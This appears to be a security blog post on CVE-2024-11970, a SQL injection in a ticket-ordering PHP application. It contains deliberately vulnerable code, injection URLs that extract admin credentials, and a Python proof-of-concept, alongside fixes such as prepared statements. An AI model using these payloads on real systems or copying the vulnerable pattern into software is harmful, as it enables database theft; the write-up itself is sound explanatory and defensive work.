![CVE-2024-11970 - Critical SQL Injection in Concert Ticket Ordering System 1. ([/tour(cor).php?mai=]) – Analysis, Exploit, and Mitigation](/content/images/size/w1200/2024/12/CVE-2024-11970.png)
In early 2024, a severe security vulnerability surfaced in the Concert Ticket Ordering System 1. developed by code-projects, marked as CVE-2024-11970. This is a SQL Injection vulnerability present in the /tour(cor).php file, specifically through the mai parameter. Below, we’ll break down what this means, demonstrate how attackers can exploit it, and share ways to fix or mitigate the issue.
What is CVE-2024-11970?
CVE-2024-11970 is a critical vulnerability discovered in the popular “Concert Ticket Ordering System” project. The system fails to properly sanitize the mai parameter in /tour(cor).php before using it in a SQL query. This allows an attacker to inject arbitrary SQL code into the application's queries—a textbook SQL Injection attack. The issue is remotely exploitable and the proof-of-concept exploit is already public.
Vulnerability type: SQL Injection
- Impact: Remote attackers can read, modify, or delete database data; in some cases, achieve remote code execution.
- Affected file: /tour(cor).php
Affected parameter: mai
- Discovery: Public exploit and advisory published – Original DSA info, VulDB entry
Where is the Problem?
Inside the Concert Ticket Ordering System’s file /tour(cor).php, the application grabs the mai parameter from user input (GET or POST) and inserts it directly into a SQL statement, like so (simplified version):
<?php
// WARNING: Vulnerable code snippet!
$mai = $_GET['mai'];
$query = "SELECT * FROM tickets WHERE id = '$mai'";
$result = mysqli_query($conn, $query);
?>
The Problem: The value of $mai is used directly—without validation or escaping—inside the SQL query. Any user can inject SQL code using the mai parameter.
Exploitation Example
Suppose the vulnerable site is at http://example.com/tour(cor).php. An attacker can exploit the vulnerability by crafting a URL like:
http://example.com/tour(cor).php?mai=1'%20OR%201=1--%20
SELECT * FROM tickets WHERE id = '1' OR 1=1-- '
- This returns all tickets instead of just the one with ID “1”.
#### More Serious Attacks
An attacker can even extract sensitive data. For example, to fetch the admin's credentials:
http://example.com/tour(cor).php?mai=1' UNION SELECT 1,username,password FROM admin-- -
If error messages are not suppressed, the attacker gets admin username and hashed password from the response.
---
## Full Exploit PoC (Proof of Concept)
Here’s a simple Python script using requests to retrieve all ticket info using the vulnerability:
python
import requests
url = "http://example.com/tour(cor).php"
payload = "1' OR 1=1-- -"
params = {"mai": payload}
r = requests.get(url, params=params)
print(r.text) # Shows the entire ticket database output
Disclaimer: Use only on systems you have permission to test!
---
## How to Fix (Mitigation)
1. Use Prepared Statements (Parameterized Queries):
Update your PHP code to use prepared statements, which automatically escape user data:
php
$mai = $_GET['mai'];
$stmt = $conn->prepare("SELECT * FROM tickets WHERE id = ?");
$stmt->bind_param("i", $mai);
$stmt->execute();
$result = $stmt->get_result();
?>
2. Input Validation:
Explicitly check that mai contains only expected values:
php
$mai = intval($_GET['mai']); // Accepts only numeric id
?>
`
3. Hide SQL Error Messages:
Make sure error reporting does not reveal sensitive details.
4. Update the Application:
If possible, use an updated and patched version of the system, or contact the vendor for a security fix.
---
## References
- NVD - CVE-2024-11970
- VulDB - CVE-2024-11970
- Original Code-Projects Concert Ticket Ordering System
---
## Final Thoughts
CVE-2024-11970 demonstrates how a simple coding mistake can lead to a catastrophic security problem. SQL Injection is one of the most dangerous web application vulnerabilities; it can lead to data theft, loss, or even full system compromise.
If you operate any installations of Concert Ticket Ordering System 1., patch this immediately—even minor systems can be attractive targets. Use the mitigation strategies above and always sanitize all user-supplied input.
Stay safe, and code securely!
Timeline
Published on: 11/28/2024 22:15:14 UTC
Last modified on: 12/02/2024 14:48:39 UTC